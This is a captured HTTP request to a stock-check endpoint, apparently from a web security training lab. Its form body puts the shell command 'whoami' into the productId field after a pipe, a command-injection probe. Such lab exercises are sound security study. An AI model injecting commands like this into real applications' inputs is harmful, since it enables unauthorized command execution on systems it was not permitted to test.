POST /product/stock HTTP/2
Host: 0a9c008d04cea34d80fac64a006f0003.web-security-academy.net
Cookie: session=wqbRwjYFlc3e5r0kgjh8KHE3g7oREawY
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://0a9c008d04cea34d80fac64a006f0003.web-security-academy.net/product?productId=2
Origin: https://0a9c008d04cea34d80fac64a006f0003.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers1
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

productId=2|whoami&storeId=3